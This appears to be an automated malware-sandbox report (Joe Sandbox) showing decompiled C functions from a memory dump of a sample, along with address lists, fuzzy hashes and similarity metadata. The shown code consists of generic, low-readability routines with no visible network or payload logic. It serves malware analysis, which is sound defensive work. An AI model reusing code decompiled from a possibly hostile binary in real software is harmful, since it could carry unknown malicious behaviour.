						_t127 = _v1104;
						if(_t127 != 0) {
							_t179 =  &_v1096;
							_t207 =  &_v1092;
							 *_t207 = _t127 -  *((intOrPtr*)(_t179 - 4));
							_push(_t179);
							_push( *_t179);
							_push(_t207);
							_push(_v1128);
							_push(0xffffffff); // executed
							E00402534(); // executed
						}
						if(_t221 == 0x4280c8 && _v1148 != 0) {
							E00406630(_v1172, 0);
						}
						goto L49;
					}
					_t161 = _t205;
					_v1108 = _t221;
					_t44 = _t221 + 8; // 0x4280d8
					_v1116 = _t44;
					_t222 = 0;
					_v1164 = 0;
					_v1120 = 0;
					do {
						_t181 = _v1172;
						if(_v1172 == 0) {
							L26:
							_t136 = _t161 & 0x0000000f;
							_t163 = _t161 >> 0x00000004 & 0x00000001;
							_t137 = _t163 + _t136 * 8;
							_v1160 = _t163 + _t136 * 8;
							_v1140 = 0;
							goto L34;
						}
						_t238 = _t222 - _t215;
						_t222 = _t215;
						if(_t238 != 0) {
							_t205 = _t222;
							_v1164 = E00404820(_t181, _t222);
						}
						if(_v1164 <= 0) {
							goto L26;
						} else {
							if((_t161 & 0x00000020) == 0) {
								L30:
								_t185 = _v1152;
								_t208 = _v1148;
								_t137 = _t185 | _t208;
								__eflags = _t185 | _t208;
								if((_t185 | _t208) != 0) {
									L33:
									_t186 = _t185 + _v1164;
									__eflags = _t186;
									_v1160 = _t186;
									asm("adc edx, 0x0");
									_v1140 = _t208;
									goto L34;
								}
								_t137 = _v1156;
								__eflags = _t137 - 2;
								if(_t137 < 2) {
									L36:
									_v1140 = 0;
									_v1160 = 0;
									goto L34;
								}
								_t208 = 0;
								__eflags = 0;
								_v1120 = 1;
								_t185 = _t137;
								goto L33;
							}
							_t144 = E00406A88(_v1172 + _v1164);
							_t166 = _t144;
							if(_t144 < 0) {
								__eflags = _v1156 - _v1172;
								if(_v1156 == _v1172) {
									goto L30;
								}
								_t205 = _v1124;
								_t146 = E004024C4( &_v1156, 1);
								__eflags = _t146;
								if(_t146 == 0) {
									goto L30;
								}
								_t148 = E00406A88(_t146 + _v1164);
								_t166 = _t148;
								__eflags = _t148;
								if(__eflags >= 0) {
									goto L21;
								}
								goto L30;
							}
							L21:
							if(_v1168 == 0) {
								goto L30;
							}
							_t137 = _v832;
							_v1160 = _v832;
							_t223 = _v828;
							_t192 = _v1168;
							_t243 = _v1168 - 1;
							if(_v1168 != 1) {
								_t137 = E00406974(_t192, _t205, _t243);
								_t244 = _t137;
								if(_t137 != 0) {
									_v1160 =  *((intOrPtr*)(_t228 + 0x158 + _t137 * 8));
									_t223 =  *((intOrPtr*)(_t228 + 0x15c + _t137 * 8));
								}
							}
							_v1140 = ( !_t166 << 0x10) + _t223;
							_t222 = _t215;
						}
						L34:
						_t164 = _v1112;
						_t205 = _t164;
						E00408BFE(_t137,  &_v1104, _t205);
						_t216 = _v1116;
						_t139 = E00408CD0(_t216, _t244, _v1160, _v1140);
						 *(_t164 + 4) = _t205;
						 *_t164 = _t139;
						_v1120 = _t164 + 8;
						_t140 = E00408824(_t164 + 8);
						_t161 = _t205;
						_v1124 = _t216 + 8;
						_t215 = _t140;
					} while ((_t140 | _t205) != 0);
					_t221 = _v1108;
					if((_v1120 & 0x00000001) != 0) {
						_t158 = _v1132;
						_t212 = _v1136;
						goto L44;
					} else {
						goto L38;
					}
					goto L36;
				}
				if(_t212 != 0 || E00401B9C(_t114, _t158) == 0) {
					goto L49;
				} else {
					_t218 = _t219;
					_v1140 = 0;
					_v1144 = 0;
					_t224 =  &_v1164;
					 *_t224 = 0;
					_t211 = _t158;
					E00404B2C(0, _t224, _t211, 0, 1);
					_t225 =  *_t224;
					_v1156 = _t225;
					_t155 = E00408844(0x4280c8, _t211);
					_v1168 = 0;
					if((_t155 | _t211) != 0) {
						_v824 = _t155;
						_v820 = _t211;
						_v1160 = 1;
					}
					_t201 =  &_v1092;
					_t121 = 0;
					 *((intOrPtr*)(_t201 - 4)) = 0;
					_v1120 = _t201;
					 *_t201 = 0;
					_v1116 = _t158;
					_t160 = _t225;
					_t221 = _t218;
					_t214 = 0;
					goto L13;
				}
			}

0x00408844
0x0040884d
0x00408853
0x0040885a
0x0040885c
0x00408864
0x004088f4
0x004088f7
0x00408bf1
0x00408bfc
0x00408bfc
0x004088fd
0x004088ff
0x0040890a
0x0040890c
0x0040890e
0x00408912
0x0040891a
0x0040891e
0x00408924
0x0040892e
0x00408933
0x00408935
0x0040893d
0x00408945
0x00408945
0x00408935
0x0040894a
0x00408952
0x00408956
0x0040895f
0x00408961
0x00408963
0x00408967
0x0040896a
0x0040896c
0x00408974
0x00408976
0x00408978
0x0040897c
0x00408997
0x0040899f
0x0040899f
0x0040897e
0x0040897e
0x00408982
0x00408987
0x0040898e
0x0040898e
0x004089a1
0x004089a5
0x004089a7
0x004089ae
0x004089b3
0x004089b8
0x004089bd
0x004089c0
0x004089c2
0x004089c5
0x004089c9
0x004089ce
0x004089d2
0x00408b6e
0x00408b74
0x00408ba2
0x00408ba6
0x00408b76
0x00408b76
0x00408b7c
0x00408b80
0x00408b82
0x00408b84
0x00408b8a
0x00408b8f
0x00408b92
0x00408b94
0x00408b94
0x00408b82
0x00408bae
0x00408bb3
0x00408bb3
0x00408bb9
0x00408bbb
0x00408bc2
0x00408bc6
0x00408bc8
0x00408bc9
0x00408bcb
0x00408bcc
0x00408bd0
0x00408bd2
0x00408bd2
0x00408bdd
0x00408bec
0x00408bec
0x00000000
0x00408bdd
0x004089d8
0x004089da
0x004089de
0x004089e1
0x004089e5
0x004089e7
0x004089ef
0x004089f7
0x004089f7
0x004089fd
0x00408a89
0x00408a8b
0x00408a91
0x00408a94
0x00408a97
0x00408a9b
0x00000000
0x00408a9b
0x00408a05
0x00408a07
0x00408a09
0x00408a0b
0x00408a12
0x00408a12
0x00408a1b
0x00000000
0x00408a1d
0x00408a20
0x00408ad7
0x00408ad7
0x00408adb
0x00408ae1
0x00408ae1
0x00408ae3
0x00408af8
0x00408af8
0x00408af8
0x00408afc
0x00408b00
0x00408b03
0x00000000
0x00408b03
0x00408ae5
0x00408ae9
0x00408aec
0x00408b51
0x00408b51
0x00408b59
0x00000000
0x00408b59
0x00408aee
0x00408aee
0x00408af2
0x00408af6
0x00000000
0x00408af6
0x00408a2e
0x00408a33
0x00408a37
0x00408aa9
0x00408aad
0x00000000
0x00000000
0x00408ab3
0x00408ab9
0x00408abe
0x00408ac0
0x00000000
0x00000000
0x00408ac8
0x00408acd
0x00408acf
0x00408ad1
0x00000000
0x00000000
0x00000000
0x00408ad1
0x00408a39
0x00408a3e
0x00000000
0x00000000
0x00408a44
0x00408a4b
0x00408a4f
0x00408a56
0x00408a5a
0x00408a5d
0x00408a5f
0x00408a64
0x00408a66
0x00408a6f
0x00408a73
0x00408a73
0x00408a66
0x00408a81
0x00408a85
0x00408a85
0x00408b07
0x00408b0b
0x00408b0f
0x00408b11
0x00408b16
0x00408b24
0x00408b29
0x00408b2c
0x00408b31
0x00408b37
0x00408b3c
0x00408b41
0x00408b45
0x00408b47
0x00408b68
0x00408b6c
0x00408b98
0x00408b9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00408b6c
0x0040886c
0x00000000
0x00408881
0x00408881
0x00408885
0x00408889
0x0040888d
0x00408891
0x00408895
0x0040889a
0x0040889f
0x004088a1
0x004088aa
0x004088b3
0x004088bb
0x004088bd
0x004088c4
0x004088ce
0x004088ce
0x004088d2
0x004088d6
0x004088d8
0x004088db
0x004088df
0x004088e1
0x004088e5
0x004088e7
0x004088e9
0x00000000
0x004088e9

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eeb2500bde8218cb01949da219717c95971ff678c17289aa86633bda70158c3
Instruction ID: d01275ed8456397dcf66331804e8ad0842268983be798731ef855cbb46ced671
Opcode Fuzzy Hash: 8eeb2500bde8218cb01949da219717c95971ff678c17289aa86633bda70158c3
Instruction Fuzzy Hash: 58B13C716083019FC714DF29C58065BBBE1ABC8314F14893EF9D9A7391DB78E805CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00404370 Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00404370(intOrPtr __ecx, intOrPtr* __edx, void* __eflags, signed char _a4, intOrPtr _a8) {
				char _v36;
				intOrPtr _v48;
				char _v52;
				char _v60;
				void* _v68;
				intOrPtr _v72;
				char _v80;
				void* _t15;
				void* _t19;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr* _t47;
				intOrPtr* _t51;

				_t51 =  &_v48;
				_t47 = __edx;
				_t15 = E0040768C(0x428181, _a4 & 0x000000ff, 0, _a8, 0);
				_t53 = _t15;
				if(_t15 < 0) {
					_t28 = _t15;
				} else {
					_v48 = __ecx;
					_push(_v60);
					E0040191E();
					_push(8);
					E0040254C( &_v36, 0x4281ab, _t53);
					_push(0);
					_push(_v68);
					_t19 = E004076B0( &_v52,  &_v36, _v60);
					if(_t19 < 0) {
						L8:
						_t28 = _t19;
						goto L9;
					} else {
						_push(_v80);
						_t19 = E00407774( &_v60, _a8, _v72);
						_t55 = _t19;
						if(_t19 < 0) {
							goto L8;
						} else {
							E004077AC( *_t51);
							_t25 = E004077C0(_v68, _t47, _t55,  &_v60,  *_t51 + 2); // executed
							_t28 = _t25;
							if(_t25 < 0) {
								L9:
								_push(0);
								_push(_v80);
								E00407A4E(_t57);
							} else {
								_t27 =  *((intOrPtr*)( *_t47 + 0x10))(_t28);
								_t28 = _t27;
								_t57 = _t27;
								if(_t27 < 0) {
									goto L9;
								}
							}
						}
					}
					_push( *_t51); // executed
					E0040191E(); // executed
				}
				return _t28;
			}

0x00406708
0x0040670b
0x00406724
0x00406729
0x0040672b
0x004067b7
0x00406731
0x00406731
0x00406735
0x00406739
0x00406750
0x00406752
0x0040675d
0x0040675f
0x00406761
0x00406768
0x004067bb
0x004067bb
0x00000000
0x0040676a
0x00406773
0x0040677a
0x0040677f
0x00406781
0x00000000
0x00406783
0x00406786
0x00406799
0x0040679e
0x004067a2
0x004067bd
0x004067bd
0x004067bf
0x004067c3
0x004067a4
0x004067ac
0x004067af
0x004067b1
0x004067b3
0x00000000
0x004067b5
0x004067b3
0x004067a2
0x00406781
0x004067c8
0x004067cb
0x004067cb
0x004067d9

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f148e47dbed93cbcd29a2e24511b4084dfe6dfada9d358be9e8d15958ca15d4c
Instruction ID: 706a8335dbcc5ea79b16b4ded0139a3a6c86755d1266b421977d7d6b6fb132eb
Opcode Fuzzy Hash: f148e47dbed93cbcd29a2e24511b4084dfe6dfada9d358be9e8d15958ca15d4c
Instruction Fuzzy Hash: 11218334308315ABD310AA16CC41E1BBBE9EFC8758F11483EF986A73D1DA39EC158666

Uniqueness

Uniqueness Score: -1.00%

Function 00407D74 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00407D74(void* __ecx, void* __edx, signed char _a4) {
				char _v48;
				intOrPtr _v52;
				void* _t4;
				void* _t5;
				intOrPtr* _t7;
				void* _t8;
				void* _t10;
				signed int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = __edx;
				_t17 = __ecx;
				_t12 = _a4 & 0x000000ff;
				if(_t12 == 0) {
					_t10 = 0x10;
					_t4 = 8;
				} else {
					if(_t12 != 1) {
						_t10 = 4;
						_t4 = 6;
					} else {
						_t10 = 2;
						_t4 = 4;
					}
				}
				_t15 = 0x1000000;
				_t22 = _t12;
				if(_t12 != 0) {
					_t15 = 0x8000000;
				}
				_push(_t14);
				_push(_t15);
				_push(_t10);
				_push(0);
				_push(0);
				_push(_t4);
				_t5 = E004067FE(_t22); // executed
				_t23 = _t5;
				if(_t5 < 0) {
					_t16 = _t5;
				} else {
					_t7 =  &_v48;
					 *_t7 = 0;
					_push(_t10);
					_push(0);
					_push(2);
					_push(_t7);
					_push(0);
					_push(0);
					_push(0);
					_push(_t17);
					_push(0xffffffff);
					_push(_v52);
					_t8 = E00406808(_t23); // executed
					_t16 = _t8;
					_push( *_t19); // executed
					E0040191E(); // executed
				}
				return _t16;
			}

0x00407d74
0x00407d7b
0x00407d7d
0x00407d84
0x00407d97
0x00407d9c
0x00407d86
0x00407d89
0x00407da3
0x00407da8
0x00407d8b
0x00407d8b
0x00407d90
0x00407d90
0x00407d89
0x00407dad
0x00407db2
0x00407db4
0x00407db6
0x00407db6
0x00407dbf
0x00407dc0
0x00407dc1
0x00407dc2
0x00407dc3
0x00407dc4
0x00407dc6
0x00407dcb
0x00407dcd
0x00407df5
0x00407dcf
0x00407dcf
0x00407dd3
0x00407dd5
0x00407dd6
0x00407dd7
0x00407dd9
0x00407dda
0x00407ddb
0x00407ddc
0x00407ddd
0x00407dde
0x00407de0
0x00407de4
0x00407de9
0x00407deb
0x00407dee
0x00407dee
0x00407e00

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23ef7602b03b7cfd25b569efe3e5c47c8f37de546e5e8ed7e59b394ae482a478
Instruction ID: 030720a6ab58a9a0f6ac7b6414738bca0fd30b7a646a8967dea6df29bbf4b102
Opcode Fuzzy Hash: 23ef7602b03b7cfd25b569efe3e5c47c8f37de546e5e8ed7e59b394ae482a478
Instruction Fuzzy Hash: 78017CA1B082087BE6105516CC55F7B799EDFC27A8F16413BFA81AB2C1D43AAC11527A

Uniqueness

Uniqueness Score: -1.00%

Function 00406B88 Relevance: .1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00406B88(void* __ecx, void* __edx, void* __eflags, char _a12) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				char _v536;
				char _v572;
				char _v580;
				void* _t15;
				short* _t16;
				intOrPtr* _t19;
				void* _t20;
				void* _t21;
				void* _t32;
				signed int* _t34;
				signed int _t35;
				void* _t36;

				_t21 = __edx;
				_t36 = __ecx;
				_t35 =  &_v536;
				_push(0);
				_t15 = E0040254C(_t35, 0x42813a, __eflags);
				_t32 = 0x4281c9;
				if(_a12 == 0) {
					_t41 =  *[fs:0xc0];
					_t32 = 0x4281c9;
					if( *[fs:0xc0] != 0) {
						_t32 = 0x4281c3;
					}
				}
				_push(0);
				_t16 = E0040254C(_t15, _t32, _t41);
				 *_t16 = 0x5c;
				_t3 = _t16 + 2; // 0x2
				_push(0);
				_t28 = E0040254C(_t3, _t21, _t41) - _t35 << 0x00000010 | E0040254C(_t3, _t21, _t41) - _t35;
				_t34 =  &_v580;
				 *_t34 = E0040254C(_t3, _t21, _t41) - _t35 << 0x00000010 | E0040254C(_t3, _t21, _t41) - _t35;
				_t34[1] = _t35;
				_t19 =  &_v572;
				 *_t19 = 0x18;
				 *((intOrPtr*)(_t19 + 4)) = 0;
				 *(_t19 + 8) = _t34;
				 *((intOrPtr*)(_t19 + 0xc)) = 0x40;
				 *((intOrPtr*)(_t19 + 0x10)) = 0;
				 *((intOrPtr*)(_t19 + 0x14)) = 0;
				_push(_v0);
				_push(_v4);
				_push(_t19);
				_push(_v8);
				_push(_t36); // executed
				_t20 = E00407D69(_t28); // executed
				return _t20;
			}

0x00406b92
0x00406b94
0x00406b96
0x00406ba1
0x00406ba3
0x00406ba8
0x00406bb5
0x00406bb7
0x00406bbf
0x00406bc4
0x00406bc6
0x00406bc6
0x00406bc4
0x00406bcf
0x00406bd0
0x00406bd5
0x00406bda
0x00406bdf
0x00406bec
0x00406bee
0x00406bf2
0x00406bf4
0x00406bf7
0x00406bfb
0x00406c01
0x00406c04
0x00406c07
0x00406c0e
0x00406c11
0x00406c16
0x00406c1d
0x00406c25
0x00406c26
0x00406c2d
0x00406c2e
0x00406c3d

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ad8051e35c5d31a32723cc44430a5f8a48f9994d3788c5bf3864bcaf9febcfa
Instruction ID: 4ddf22d51bb194440515ec73fa101ad5c16a4aa5644139fcb425d71a2cf9d4ba
Opcode Fuzzy Hash: 8ad8051e35c5d31a32723cc44430a5f8a48f9994d3788c5bf3864bcaf9febcfa
Instruction Fuzzy Hash: 8311BCB16017149FD3249F15D858B6BFBE5EFC0314F05C52FE00A4B2E1DBB899158BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406814 Relevance: .1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00406814(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v12;
				intOrPtr _v20;
				void* _t10;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t23;
				intOrPtr _t24;
				char _t25;
				void* _t26;
				intOrPtr* _t27;
				void* _t28;

				_t28 = __eflags;
				_v20 = __edx;
				_t25 = _a8;
				 *_t27 = __ecx;
				_t24 = __ecx + 4;
				_t17 = _t24;
				while(1) {
					_push( &_a8);
					_push(_t25);
					_push(_t17);
					_push(_a4);
					_push(_v20);
					_t10 = E00407A62(_t28); // executed
					_t26 = _t10;
					if(_t10 >= 0) {
						break;
					}
					if(_t17 != _t24) {
						E00407A6C(_t17);
						_t27 = _t27 + 4;
					}
					_t23 =  *0x427f00; // 0xec3372a4
					if(_t23 == E00402510(0x427f00, _t26)) {
						_t25 = _v12;
						_t14 = E00407A7C(_t25);
						_t27 = _t27 + 4;
						_t17 = _t14;
						if(_t14 != 0) {
							continue;
						} else {
							_t26 = E00401588(0x42713c);
							_t17 = 0;
						}
					}
					break;
				}
				 *((intOrPtr*)( *_t27)) = _t17;
				return _t26;
			}

0x00406814
0x0040681b
0x00406823
0x00406825
0x00406828
0x0040682b
0x0040682d
0x00406831
0x00406832
0x00406833
0x00406834
0x00406838
0x0040683c
0x00406841
0x00406845
0x00000000
0x00000000
0x00406849
0x0040684c
0x00406851
0x00406851
0x00406854
0x00406868
0x0040686a
0x0040686f
0x00406874
0x00406877
0x0040687b
0x00000000
0x0040687d
0x00406887
0x00406889
0x00406889
0x0040687b
0x00000000
0x00406868
0x0040688e
0x00406899

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee857c8f6d77b8c077b372320296aba67333bd320c1b100a1e010420f41dd6f0
Instruction ID: ba6f2e14f91e4ec893c92117bd967a1e658bf022fec50e48c5919818c97fd4bc
Opcode Fuzzy Hash: ee857c8f6d77b8c077b372320296aba67333bd320c1b100a1e010420f41dd6f0
Instruction Fuzzy Hash: 8D0152727082045FC701BA659C8185B7698FB89348F05443EFE8AA7391E539EE1887A6

Uniqueness

Uniqueness Score: -1.00%

Function 004025D4 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004025D4(void* __eax, void* __ecx, signed int* __edx) {
				void* _t5;
				void* _t9;
				signed int _t10;
				void* _t11;
				signed int _t15;
				void* _t20;
				signed int* _t21;
				intOrPtr* _t22;

				_t21 = __edx;
				_push(_t22);
				_push(8);
				_push(__ecx);
				_t5 = E00401B49();
				if(_t5 < 0) {
					_t11 = _t5;
				} else {
					_t20 = E00404C08();
					if(_t21 == 0 || _t20 < 0) {
						L9:
						_t11 = _t20;
					} else {
						_t9 = E0040263C();
						_t27 = _t9;
						if(_t9 == 0) {
							__eflags = _t20 - 2;
							_t15 = (0 | _t20 - 0x00000002 >= 0x00000000 | 0x00000002) << 0xc;
							__eflags = _t15;
							goto L8;
						} else {
							_t10 = E00404C38( *_t22, _t27);
							_t15 = _t10;
							if(_t10 >= 0) {
								L8:
								 *_t21 = _t15;
								goto L9;
							} else {
							}
						}
					}
					_push( *_t22); // executed
					E0040191E(); // executed
				}
				return _t11;
			}

0x004025d8
0x004025dc
0x004025dd
0x004025df
0x004025e0
0x004025e7
0x00402614
0x004025e9
0x004025f1
0x004025f5
0x00402628
0x00402628
0x004025fb
0x004025fb
0x00402600
0x00402602
0x0040261a
0x00402623
0x00402623
0x00000000
0x00402604
0x00402607
0x0040260c
0x00402610
0x00402626
0x00402626
0x00000000
0x00000000
0x00402612
0x00402610
0x00402602
0x0040262a
0x0040262d
0x0040262d
0x0040263a

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37b283c94a3fca40b1bdcc9272d5bb9e58b019d34c065848e70473e8f358d753
Instruction ID: bb08e3c79c59cece35e923c0f654ff34a41923a11e1924a1d11d00a0c5257e4d
Opcode Fuzzy Hash: 37b283c94a3fca40b1bdcc9272d5bb9e58b019d34c065848e70473e8f358d753
Instruction Fuzzy Hash: 03F024B13016115BD32266668D9991FA688CBC0354F050C3FFE80F73C1D9BADC068329

Uniqueness

Uniqueness Score: -1.00%

Function 00408BFE Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00408BFE(intOrPtr __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _t4;
				intOrPtr* _t5;
				intOrPtr _t6;
				intOrPtr* _t10;
				intOrPtr* _t11;

				_t4 = __eax;
				_push(__eax);
				if( *0x429010 == 0) {
					_t10 = __ecx;
					if( *__ecx <= __edx) {
						 *__ecx = __edx;
						_t5 = _t11;
						 *_t5 = 8;
						_push(__ecx + 8);
						_push(4);
						_push(_t5);
						_push(__ecx);
						_push(0xffffffff); // executed
						_t4 = E00402534(); // executed
						if(_t4 >= 0) {
							_t6 =  *_t10;
							if( *((intOrPtr*)(_t10 + 4)) == 0) {
								 *((intOrPtr*)(_t10 + 4)) = _t6;
							}
							_t4 = _t6 +  *_t11;
							 *_t10 = _t4;
						}
					}
				}
				return _t4;
			}

0x00408bfe
0x00408bff
0x00408c07
0x00408c09
0x00408c0d
0x00408c0f
0x00408c11
0x00408c13
0x00408c1c
0x00408c1d
0x00408c1f
0x00408c20
0x00408c21
0x00408c23
0x00408c2a
0x00408c2c
0x00408c32
0x00408c34
0x00408c34
0x00408c37
0x00408c3a
0x00408c3a
0x00408c2a
0x00408c0d
0x00408c40

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9778eb3a7190b169e90ad280a9092adb2b27aff12599126c3a322e0985dd6251
Instruction ID: a89c56106c4875c5afdbdacbdb95bca2bcc258dbd6571fb2ad460f1bc6cd2d8b
Opcode Fuzzy Hash: 9778eb3a7190b169e90ad280a9092adb2b27aff12599126c3a322e0985dd6251
Instruction Fuzzy Hash: 4DF085B01063559EE3308F14D904B43BBE4AB113A4F544A3DA0E4A73D0E7B8A882CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004087AC Relevance: .0, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E004087AC(void* __ecx, void* __edx) {
				void* _t2;
				signed short _t5;
				signed short _t10;
				void* _t24;

				_push(0);
				_push(__edx);
				_push(3);
				_push(0);
				_push(7);
				_push(0x100000);
				_push(__ecx); // executed
				_t2 = E00408C6C(); // executed
				if(_t2 == 0xffffffff) {
					_t10 =  *[fs:0x34];
					if((_t10 & 0xfffffffe) != 2) {
						_t5 = _t10;
						if(_t10 >= 0) {
							L1();
							return _t5 + (_t5 & 0x0000ffff);
						}
						return _t5;
					} else {
						_push(_t19);
						return E00401C10(E00401BFC(_t24 - 8), _t24 - 8, 0x4270b8);
					}
				} else {
					_push(__eax); // executed
					__eax = E0040191E(); // executed
					__eax = 0;
					return 0;
				}
			}

0x004087ae
0x004087af
0x004087b0
0x004087b2
0x004087b3
0x004087b5
0x004087ba
0x004087bb
0x004087c3
0x004087ce
0x004087dd
0x00405c20
0x00405c24
0x00405c2f
0x00000000
0x00405c36
0x00405c37
0x004087df
0x00401589
0x004015a6
0x004015a6
0x004087c5
0x004087c5
0x004087c6
0x004087cb
0x004087cd
0x004087cd

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92da950364f4fcb8a38ef44defaa7d6ce8d17aaa12f75b5627ab789746fb4eb5
Instruction ID: 7ecf57a94ba3128c00ab2cb3af7cb1a15bbb14d97c053b8fdc35369aca6635c2
Opcode Fuzzy Hash: 92da950364f4fcb8a38ef44defaa7d6ce8d17aaa12f75b5627ab789746fb4eb5
Instruction Fuzzy Hash: 05E012A2355600B5F63551345E57B37105DC780B24F300B3F7962F75E4C97CD941902E

Uniqueness

Uniqueness Score: -1.00%

Function 0040143A Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040143A() {
				void* _t3;
				signed int _t6;
				void* _t7;
				signed int _t8;

				_t3 = E00401B3F();
				_push(_t3);
				_push(8);
				_push(0xffffffff);
				if(E00401B49() < 0) {
					_t6 = 0;
				} else {
					_t7 = E00401B54();
					_push( *_t13); // executed
					_t8 = E0040191E(); // executed
					_t6 = _t8 & 0xffffff00 | _t7 - 0x00000002 > 0x00000000;
				}
				return _t6;
			}

0x0040143a
0x00401440
0x00401444
0x00401446
0x0040144f
0x0040146b
0x00401451
0x00401454
0x0040145b
0x0040145e
0x00401466
0x00401466
0x00401471

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faefb1d7b204acd8689f2f5cfd26ba56bcd486eaf8110d9b192a75c5d8343e42
Instruction ID: 08526c275e4776c96a67271048fb3cbe2c005f17bdab2a31bac4fe5153846ecb
Opcode Fuzzy Hash: faefb1d7b204acd8689f2f5cfd26ba56bcd486eaf8110d9b192a75c5d8343e42
Instruction Fuzzy Hash: 7AD05B62B04010A7D55075365C43A7A755CCB10778F04053EF8A5B71F1E5286C44C667

Uniqueness

Uniqueness Score: -1.00%

Function 0040143F Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040143F(void* __eax) {
				signed int _t6;
				void* _t7;
				signed int _t8;

				_push(8);
				_push(0xffffffff);
				if(E00401B49() < 0) {
					_t6 = 0;
				} else {
					_t7 = E00401B54();
					_push( *_t11); // executed
					_t8 = E0040191E(); // executed
					_t6 = _t8 & 0xffffff00 | _t7 - 0x00000002 > 0x00000000;
				}
				return _t6;
			}

0x00401444
0x00401446
0x0040144f
0x0040146b
0x00401451
0x00401454
0x0040145b
0x0040145e
0x00401466
0x00401466
0x00401471

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 129c951ff11e220347995e0f92ae488dfa776c5f8f9be3699440928ededcf26b
Instruction ID: fed2f2bff93db5886f0c0a1785bb4afdd4c8afcea17a7c82607fb00db42d06a7
Opcode Fuzzy Hash: 129c951ff11e220347995e0f92ae488dfa776c5f8f9be3699440928ededcf26b
Instruction Fuzzy Hash: F0D05B6170401067D65075755C43A6B759CCB00778F04053AFCB5E61F1E5286C85C667

Uniqueness

Uniqueness Score: -1.00%

Function 004086EC Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E004086EC(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t16;

				_t16 = __ecx;
				 *__ecx = _a4;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				if( *0x429010 == 0) {
					 *((intOrPtr*)(__ecx + 4)) = _a8;
					_push(__ecx + 8);
					_push(_a12);
					_push(__ecx + 4);
					_push(__ecx);
					_push(0xffffffff); // executed
					E00402534(); // executed
				}
				return _t16;
			}

0x004086ed
0x004086f3
0x004086f5
0x00408703
0x00408710
0x00408716
0x00408717
0x00408718
0x00408719
0x0040871a
0x0040871c
0x0040871c
0x00408724

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

